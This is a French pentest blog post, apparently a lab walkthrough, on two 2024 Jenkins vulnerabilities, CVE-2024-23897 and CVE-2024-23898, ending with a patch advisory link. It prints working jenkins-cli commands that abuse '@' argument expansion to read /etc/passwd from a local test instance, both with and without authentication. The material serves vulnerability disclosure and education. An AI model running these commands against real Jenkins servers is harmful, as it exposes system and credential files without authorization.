<!DOCTYPE html>
<html lang="fr">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <meta name="robots" content="noodp" />
        <link rel="icon" href="/images/zale.jpeg" type="image/x-icon">
        <title>Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs - zalepentester | Blog</title><meta name="Description" content="Blog de zalepentester"><meta property="og:title" content="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs" />
<meta property="og:description" content="Introduction Les chercheurs en sécurité de SonarSource ont découvert deux failles de sécurité dans Jenkins : CVE-2024-23897 et CVE-2024-23898. Jenkins a été informé de la découverte de ces vulnérabilités le 13 novembre 2023.
Deux vulnérabilités sont expliquées :
𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 : C&rsquo;est une vulnérabilité qui permet à un attaquant non authentifié, et disposant de la permission &ldquo;overall/read&rdquo;, de lire les données des fichiers présents sur le serveur. Sans cette permission, il est possible de lire les premières lignes des fichiers." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://zalepentester.com/jenkins_rce/" /><meta property="og:image" content="https://zalepentester.com/images/jenkins-rce.jpg" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2024-02-01T09:21:51+00:00" />
<meta property="article:modified_time" content="2024-02-01T09:21:51+00:00" /><meta property="og:site_name" content="zalepentester | Blog" />

<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="https://zalepentester.com/images/jenkins-rce.jpg" /><meta name="twitter:title" content="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs"/>
<meta name="twitter:description" content="Introduction Les chercheurs en sécurité de SonarSource ont découvert deux failles de sécurité dans Jenkins : CVE-2024-23897 et CVE-2024-23898. Jenkins a été informé de la découverte de ces vulnérabilités le 13 novembre 2023.
Deux vulnérabilités sont expliquées :
𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 : C&rsquo;est une vulnérabilité qui permet à un attaquant non authentifié, et disposant de la permission &ldquo;overall/read&rdquo;, de lire les données des fichiers présents sur le serveur. Sans cette permission, il est possible de lire les premières lignes des fichiers."/>
<meta name="twitter:site" content="@zalepentester"/>
<meta name="application-name" content="zalepentester | Blog">
<meta name="apple-mobile-web-app-title" content="zalepentester | Blog"><meta name="theme-color" content="#ffffff"><meta name="msapplication-TileColor" content="#da532c"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" />
        <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"><link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"><link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5"><link rel="manifest" href="/site.webmanifest"><link rel="canonical" href="https://zalepentester.com/jenkins_rce/" /><link rel="stylesheet" href="/css/style.min.css"><link rel="preload" href="/lib/fontawesome-free/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="/lib/fontawesome-free/all.min.css"></noscript><link rel="preload" href="/lib/animate/animate.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
        <noscript><link rel="stylesheet" href="/lib/animate/animate.min.css"></noscript><script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "headline": "Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation \u0026 Correctifs",
        "inLanguage": "fr",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "https:\/\/zalepentester.com\/jenkins_rce\/"
        },"genre": "posts","wordcount":  309 ,
        "url": "https:\/\/zalepentester.com\/jenkins_rce\/","datePublished": "2024-02-01T09:21:51+00:00","dateModified": "2024-02-01T09:21:51+00:00","publisher": {
            "@type": "Organization",
            "name": ""},"author": {
                "@type": "Person",
                "name": "Saliou Thiam"
            },"description": ""
    }
    </script></head>
    <body data-header-desktop="fixed" data-header-mobile="auto"><script type="text/javascript">(window.localStorage && localStorage.getItem('theme') ? localStorage.getItem('theme') === 'dark' : ('dark' === 'auto' ? window.matchMedia('(prefers-color-scheme: dark)').matches : 'dark' === 'dark')) && document.body.setAttribute('theme', 'dark');</script>

        <div id="mask"></div><div class="wrapper"><header class="desktop" id="header-desktop">
    <div class="header-wrapper">
        <div class="header-title">
            <a href="/" title="zalepentester | Blog">zalepentester</a>
        </div>
        <div class="menu">
            <div class="menu-inner"><a class="menu-item" href="/posts/" title="Articles"> Articles </a><a class="menu-item" href="/apropos/apropos" title="A propos"> A propos </a><span class="menu-item delimiter"></span><span class="menu-item search" id="search-desktop">
                        <input type="text" placeholder="Rechercher des titres, des contenus..." id="search-input-desktop">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-desktop" title="Chercher">
                            <i class="fas fa-search fa-fw" aria-hidden="true"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-desktop" title="Clair">
                            <i class="fas fa-times-circle fa-fw" aria-hidden="true"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-desktop">
                            <i class="fas fa-spinner fa-fw fa-spin" aria-hidden="true"></i>
                        </span>
                    </span><a href="javascript:void(0);" class="menu-item theme-switch" title="Changer de Thème">
                    <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
                </a></div>
        </div>
    </div>
</header><header class="mobile" id="header-mobile">
    <div class="header-container">
        <div class="header-wrapper">
            <div class="header-title">
                <a href="/" title="zalepentester | Blog">zalepentester</a>
            </div>
            <div class="menu-toggle" id="menu-toggle-mobile">
                <span></span><span></span><span></span>
            </div>
        </div>
        <div class="menu" id="menu-mobile"><div class="search-wrapper">
                    <div class="search mobile" id="search-mobile">
                        <input type="text" placeholder="Rechercher des titres, des contenus..." id="search-input-mobile">
                        <a href="javascript:void(0);" class="search-button search-toggle" id="search-toggle-mobile" title="Chercher">
                            <i class="fas fa-search fa-fw" aria-hidden="true"></i>
                        </a>
                        <a href="javascript:void(0);" class="search-button search-clear" id="search-clear-mobile" title="Clair">
                            <i class="fas fa-times-circle fa-fw" aria-hidden="true"></i>
                        </a>
                        <span class="search-button search-loading" id="search-loading-mobile">
                            <i class="fas fa-spinner fa-fw fa-spin" aria-hidden="true"></i>
                        </span>
                    </div>
                    <a href="javascript:void(0);" class="search-cancel" id="search-cancel-mobile">
                        Annuler
                    </a>
                </div><a class="menu-item" href="/posts/" title="Articles">Articles</a><a class="menu-item" href="/apropos/apropos" title="A propos">A propos</a><a href="javascript:void(0);" class="menu-item theme-switch" title="Changer de Thème">
                <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
            </a></div>
    </div>
</header><div class="search-dropdown desktop">
        <div id="search-dropdown-desktop"></div>
    </div>
    <div class="search-dropdown mobile">
        <div id="search-dropdown-mobile"></div>
    </div><main class="main">
                <div class="container"><div class="toc" id="toc-auto">
            <h2 class="toc-title">Contenu</h2>
            <div class="toc-content" id="toc-content-auto"></div>
        </div><article class="page single"><h1 class="single-title animate__animated animate__flipInX">Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation & Correctifs</h1><div class="post-meta">
            <div class="post-meta-line"><span class="post-author"><a href="https://twitter.com/zalepentester" title="Author" target="_blank" rel="noopener noreffer author" class="author"><i class="fas fa-user-circle fa-fw" aria-hidden="true"></i>Saliou Thiam</a></span></div>
            <div class="post-meta-line"><i class="far fa-calendar-alt fa-fw" aria-hidden="true"></i>&nbsp;<time datetime="01/02/2024">01/02/2024</time>&nbsp;<i class="fas fa-pencil-alt fa-fw" aria-hidden="true"></i>&nbsp;309 mots&nbsp;
                <i class="far fa-clock fa-fw" aria-hidden="true"></i>&nbsp;2 minutes&nbsp;</div>
        </div><div class="featured-image"><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/jenkins-rce.jpg"
        data-srcset="/images/jenkins-rce.jpg, /images/jenkins-rce.jpg 1.5x, /images/jenkins-rce.jpg 2x"
        data-sizes="auto"
        alt="/images/jenkins-rce.jpg"
        title="/images/jenkins-rce.jpg" /></div><div class="details toc" id="toc-static"  data-kept="">
                <div class="details-summary toc-title">
                    <span>Contenu</span>
                    <span><i class="details-icon fas fa-angle-right" aria-hidden="true"></i></span>
                </div>
                <div class="details-content toc-content" id="toc-content-static"><nav id="TableOfContents">
  <ul>
    <li><a href="#introduction">Introduction</a></li>
    <li><a href="#exploitation-de-𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳">Exploitation de 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳</a></li>
    <li><a href="#exploitation-de-𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟴">Exploitation de 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟴</a></li>
    <li><a href="#correctifs">Correctifs</a></li>
  </ul>
</nav></div>
            </div><div class="content" id="content"><h2 id="introduction">Introduction</h2>
<p>Les chercheurs en sécurité de SonarSource ont découvert deux failles de sécurité dans Jenkins : CVE-2024-23897 et CVE-2024-23898. Jenkins a été informé de la découverte de ces vulnérabilités le 13 novembre 2023.</p>
<p>Deux vulnérabilités sont expliquées :</p>
<ul>
<li>𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 :</li>
</ul>
<p>C&rsquo;est une vulnérabilité qui permet à un attaquant non authentifié, et disposant de la permission &ldquo;overall/read&rdquo;, de lire les données des fichiers présents sur le serveur. Sans cette permission, il est possible de lire les premières lignes des fichiers.</p>
<pre><code>Versions vulnérables : Les versions antérieures à 2.442 et 2.426.3 LTS
</code></pre>
<ul>
<li>𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟴 :</li>
</ul>
<p>󠁝󠀠C&rsquo;est une vulnérabilité qui  permet à un attaquant d&rsquo;exécuter des commandes à distance en incitant un utilisateur à cliquer sur un lien malveillant. Elle est de type &ldquo;cross-site WebSocket hijacking (CSWSH)&rdquo;.</p>
<pre><code>Versions vulnérables : La version 2.217 à la version 2.441 (incluses toutes deux), LTS de la version 2.222.1 à la version 2.426.2 
(toutes deux incluses).
</code></pre>
<h2 id="exploitation-de-𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳">Exploitation de 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳</h2>
<p>J&rsquo;ai hosté Jenkins avec le projet Vulnhub disponible sur <a href="https://github.com/vulhub/vulhub" target="_blank" rel="noopener noreffer ">https://github.com/vulhub/vulhub</a>.</p>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/jenkinslocalhost.png"
        data-srcset="/images/jenkinslocalhost.png, /images/jenkinslocalhost.png 1.5x, /images/jenkinslocalhost.png 2x"
        data-sizes="auto"
        alt="/images/jenkinslocalhost.png"
        title="VulnHub" /></p>
<ul>
<li>Détection de la vulnérabilité</li>
</ul>
<p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/jenkinsnuclei.png"
        data-srcset="/images/jenkinsnuclei.png, /images/jenkinsnuclei.png 1.5x, /images/jenkinsnuclei.png 2x"
        data-sizes="auto"
        alt="/images/jenkinsnuclei.png"
        title="Nuclei" /></p>
<ul>
<li>Exploitation de la vulnérabilité</li>
</ul>
<p>Un utilisateur disposant des identifiants de connexion peut lire un fichier au complet (exemple : /etc/passwd).</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">java -jar jenkins-cli.jar -noCertificateCheck -s http://localhost:8080/ -auth admin:admin connect-node &#34;@/etc/passwd&#34;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/jenkins_user_authentified.png"
        data-srcset="/images/jenkins_user_authentified.png, /images/jenkins_user_authentified.png 1.5x, /images/jenkins_user_authentified.png 2x"
        data-sizes="auto"
        alt="/images/jenkins_user_authentified.png"
        title="Utilisateur authentifié" /></p>
<p>Un attaquant non authentifié ou sans les autorisations de lecture globales nécessaires, peut seulement lire 3 lignes : Lire la première ligne</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">java -jar jenkins-cli.jar -noCertificateCheck -s http://localhost:8080/ who-am-i &#34;@/etc/passwd&#34;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/poc1.png"
        data-srcset="/images/poc1.png, /images/poc1.png 1.5x, /images/poc1.png 2x"
        data-sizes="auto"
        alt="/images/poc1.png"
        title="POC 1" /></p>
<p>Lire la deuxième ligne</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">java -jar jenkins-cli.jar -noCertificateCheck -s http://localhost:8080/ enable-job &#34;@/etc/passwd&#34;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/poc21.png"
        data-srcset="/images/poc21.png, /images/poc21.png 1.5x, /images/poc21.png 2x"
        data-sizes="auto"
        alt="/images/poc21.png"
        title="POC 2" /></p>
<p>Lire la troisième ligne</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">java -jar jenkins-cli.jar -noCertificateCheck -s http://localhost:8080/ help &#34;@/etc/passwd&#34;
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/poc31.png"
        data-srcset="/images/poc31.png, /images/poc31.png 1.5x, /images/poc31.png 2x"
        data-sizes="auto"
        alt="/images/poc31.png"
        title="POC 3" /></p>
<h2 id="exploitation-de-𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟴">Exploitation de 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟴</h2>
<p>On installe Jenkins 2.440 qui est une version vulnérable avec Docker.</p>
<p>Les commandes suivantes permettent d&rsquo;installer et de lancer Jenkins en local.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo docker pull jenkins/jenkins:2.440-jdk17
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo docker run -p 8080:8080 jenkins/jenkins:2.440-jdk17
</span></span></code></pre></td></tr></table>
</div>
</div><p><img
        class="lazyload"
        src="/svg/loading.min.svg"
        data-src="/images/dashboardjenkins.png"
        data-srcset="/images/dashboardjenkins.png, /images/dashboardjenkins.png 1.5x, /images/dashboardjenkins.png 2x"
        data-sizes="auto"
        alt="/images/dashboardjenkins.png"
        title="Dashboard Jenkins 2.440" /></p>
<ul>
<li>Exploitation de la vulnérabilité</li>
</ul>

<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
  <iframe src="https://www.youtube-nocookie.com/embed/7Ox6g7S-1ag" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" allowfullscreen title="YouTube Video"></iframe>
</div>

<h2 id="correctifs">Correctifs</h2>
<p>Mettre à jour la dernière version de Jenkins. Un correctif est déjà disponible.</p>
<p><a href="https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314" target="_blank" rel="noopener noreffer ">https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314</a></p>
</div><div class="post-footer" id="post-footer">
    <div class="post-info">
        <div class="post-info-line">
            <div class="post-info-mod">
                <span>Mis à jour le 01/02/2024</span>
            </div></div>
        <div class="post-info-line">
            <div class="post-info-md"><span>
                            <a class="link-to-markdown" href="/jenkins_rce/index.md" target="_blank"></a>
                        </span></div>
            <div class="post-info-share">
                <span><a href="javascript:void(0);" title="Partager sur Twitter" data-sharer="twitter" data-url="https://zalepentester.com/jenkins_rce/" data-title="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs" data-via="zalepentester"><i class="fab fa-twitter fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Facebook" data-sharer="facebook" data-url="https://zalepentester.com/jenkins_rce/"><i class="fab fa-facebook-square fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Linkedin" data-sharer="linkedin" data-url="https://zalepentester.com/jenkins_rce/"><i class="fab fa-linkedin fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur WhatsApp" data-sharer="whatsapp" data-url="https://zalepentester.com/jenkins_rce/" data-title="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs" data-web><i class="fab fa-whatsapp fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Hacker News" data-sharer="hackernews" data-url="https://zalepentester.com/jenkins_rce/" data-title="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs"><i class="fab fa-hacker-news fa-fw" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur Line" data-sharer="line" data-url="https://zalepentester.com/jenkins_rce/" data-title="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs"><i data-svg-src="/lib/simple-icons/icons/line.min.svg" aria-hidden="true"></i></a><a href="javascript:void(0);" title="Partager sur 微博" data-sharer="weibo" data-url="https://zalepentester.com/jenkins_rce/" data-title="Jenkins : Deux vulnérabilités critiques (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵𝟳 - 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟮𝟯𝟴𝟵8) Exploitation &amp; Correctifs" data-image="/images/jenkins-rce.jpg"><i class="fab fa-weibo fa-fw" aria-hidden="true"></i></a></span>
            </div>
        </div>
    </div>

    <div class="post-info-more">
        <section class="post-tags"></section>
        <section>
            <span><a href="javascript:void(0);" onclick="window.history.back();">Retour</a></span>&nbsp;|&nbsp;<span><a href="/">Accueil</a></span>
        </section>
    </div>

    <div class="post-nav"></div>
</div>
</article></div>
            </main><footer class="footer">
        <div class="footer-container"><div class="footer-line">Tout sur le Pentest</div><div class="footer-line">Propulsé par Saliou Thiam
                </div><div class="footer-line" itemscope itemtype="http://schema.org/CreativeWork"><i class="far fa-copyright fa-fw" aria-hidden="true"></i><span itemprop="copyrightYear">2024</span></div>
        </div>
    </footer></div>

        <div id="fixed-buttons"><a href="#" id="back-to-top" class="fixed-button" title="Retour en Haut">
                <i class="fas fa-arrow-up fa-fw" aria-hidden="true"></i>
            </a><a href="#" id="view-comments" class="fixed-button" title="Afficher les Commentaires">
                <i class="fas fa-comment fa-fw" aria-hidden="true"></i>
            </a>
        </div><link rel="stylesheet" href="/lib/katex/katex.min.css"><link rel="stylesheet" href="/lib/cookieconsent/cookieconsent.min.css"><script type="text/javascript" src="/lib/autocomplete/autocomplete.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.stemmer.support.min.js"></script><script type="text/javascript" src="/lib/lunr/lunr.fr.min.js"></script><script type="text/javascript" src="/lib/lazysizes/lazysizes.min.js"></script><script type="text/javascript" src="/lib/clipboard/clipboard.min.js"></script><script type="text/javascript" src="/lib/sharer/sharer.min.js"></script><script type="text/javascript" src="/lib/katex/katex.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/auto-render.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/copy-tex.min.js"></script><script type="text/javascript" src="/lib/katex/contrib/mhchem.min.js"></script><script type="text/javascript" src="/lib/cookieconsent/cookieconsent.min.js"></script><script type="text/javascript">window.config={"code":{"copyTitle":"Copier dans le presse-papiers","maxShownLines":50},"comment":{},"cookieconsent":{"content":{"dismiss":"Se mettre d'accord","link":"Apprendre encore plus","message":"Ce site Web utilise des Cookies pour améliorer votre expérience."},"enable":true,"palette":{"button":{"background":"#f0f0f0"},"popup":{"background":"#1aa3ff"}},"theme":"edgeless"},"math":{"delimiters":[{"display":true,"left":"$$","right":"$$"},{"display":true,"left":"\\[","right":"\\]"},{"display":true,"left":"\\begin{equation}","right":"\\end{equation}"},{"display":true,"left":"\\begin{equation*}","right":"\\end{equation*}"},{"display":true,"left":"\\begin{align}","right":"\\end{align}"},{"display":true,"left":"\\begin{align*}","right":"\\end{align*}"},{"display":true,"left":"\\begin{alignat}","right":"\\end{alignat}"},{"display":true,"left":"\\begin{alignat*}","right":"\\end{alignat*}"},{"display":true,"left":"\\begin{gather}","right":"\\end{gather}"},{"display":true,"left":"\\begin{CD}","right":"\\end{CD}"},{"display":false,"left":"$","right":"$"},{"display":false,"left":"\\(","right":"\\)"}],"strict":false},"search":{"highlightTag":"em","lunrIndexURL":"/index.json","lunrLanguageCode":"fr","maxResultLength":10,"noResultsFound":"Aucun résultat trouvé","snippetLength":30,"type":"lunr"}};</script><script type="text/javascript" src="/js/theme.min.js"></script></body>
</html>
